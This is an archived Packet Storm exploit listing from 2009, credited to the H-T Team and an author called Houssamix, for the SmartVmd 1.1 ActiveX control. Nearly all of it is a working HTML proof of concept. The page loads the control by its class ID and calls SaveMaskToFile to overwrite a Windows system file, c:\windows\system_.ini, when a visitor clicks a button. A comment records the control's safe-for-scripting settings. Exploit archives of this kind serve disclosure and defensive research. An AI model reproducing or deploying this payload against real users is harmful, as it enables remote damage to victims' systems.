SmartVmd 1.1 File Overwrite Exploit

2009-01-21T00:00:00
ID PACKETSTORM:74124
Type packetstorm
Reporter H-T Team
Modified 2009-01-21T00:00:00

Description

                                        
                                            `<HTML>  
<BODY>  
  
<b>   
Author : Houssamix <br/> <br/> <br/>  
  
SmartVmd ActiveX v 1.1 remote File Overwrite Exploit <br/>  
  
download : http://www.smartvmd.com/setup/SetupActiveXVmd.msi <br/>  
<b/>  
  
  
<object id=hsmx classid="clsid:{E3462D53-47A6-11D8-8EF6-DAE89272743C}"></object>  
  
<SCRIPT>  
/*  
  
Report for Clsid: {E3462D53-47A6-11D8-8EF6-DAE89272743C}  
RegKey Safe for Script: Faux  
RegKey Safe for Init: Faux  
Implements IObjectSafety: Vrai  
IDisp Safe: Safe for untrusted: caller   
  
*/  
function hehe()  
{  
File = "c:\\windows\\system_.ini"  
hsmx.SaveMaskToFile(File)  
}  
  
</SCRIPT>  
<input language=JavaScript onclick=hehe() type=button value="execute exploit"><br>  
</body>  
</HTML>  
  
  
`